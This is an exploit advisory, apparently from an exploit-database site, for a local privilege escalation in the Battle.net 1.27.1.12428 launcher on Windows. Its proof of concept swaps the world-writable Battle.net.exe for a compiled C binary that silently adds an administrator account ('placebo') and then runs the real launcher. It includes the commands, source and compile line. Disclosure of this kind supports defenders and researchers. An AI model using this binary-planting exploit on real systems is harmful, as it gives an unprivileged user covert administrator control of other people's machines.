Battle.Net 1.27.1.12428 Insecure File Permissions

2020.10.13
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Battle.Net 1.27.1.12428 - Insecure File Permissions # Date: 2020-10-09 # Exploit Author: George Tsimpidas # Software Link : https://www.blizzard.com/en-gb/download/ ( Battle Net Desktop ) # Version Patch: 1.27.1.12428 # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362 # Category: local Vulnerability Description: Battle.Net Launcher (Battle.net.exe) suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Users' group, making the entire directory 'Battle.net' and its files and sub-dirs world-writable. ## Insecure Folder Permission C:\Program Files (x86)>icacls Battle.net Battle.net BUILTIN\Users:(OI)(CI)(F) BUILTIN\Administrators:(OI)(CI)(F) CREATOR OWNER:(OI)(CI)(F) ## Insecure File Permission C:\Program Files (x86)\Battle.net>icacls "Battle.net.exe" Battle.net.exe BUILTIN\Users:(I)(F) BUILTIN\Administrators:(I)(F) FREY-OMEN\30698:(I)(F) ## Local Privilege Escalation Proof of Concept #0. Download & install #1. Create low privileged user & change to the user ## As admin C:\>net user lowpriv Password123! /add C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the Service EXE to a new name C:\Program Files (x86)\Battle.net> whoami lowpriv C:\Program Files (x86)\Battle.net> move Battle.net.exe Battle.frey.exe 1 file(s) moved. #3. Create malicious binary on kali linux ## Add Admin User C Code kali# cat addAdmin.c int main(void){ system("net user placebo mypassword /add"); system("net localgroup Administrators placebo /add"); WinExec("C:\\Program Files (x86)\\Battle.net\\Battle.frey.exe>",0); return 0; } ## Compile Code kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Battle.net.exe #4. Transfer created 'Battle.net.exe' to the Windows Host #5. Move the created 'Battle.net.exe' binary to the 'C:\Program Files (x86)\Battle.net>' Folder C:\Program Files (x86)\Battle.net> move C:\Users\lowpriv\Downloads\Battle.net.exe . #6. Check that exploit admin user doesn't exists C:\Program Files (x86)\Battle.net> net user placebo The user name could not be found #6. Reboot the Computer C:\Program Files (x86)\Battle.net> shutdown /r #7. Login & look at that new Admin C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr /v "Full" User name placebo Local Group Memberships *Administrators *Users Global Group memberships *None


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top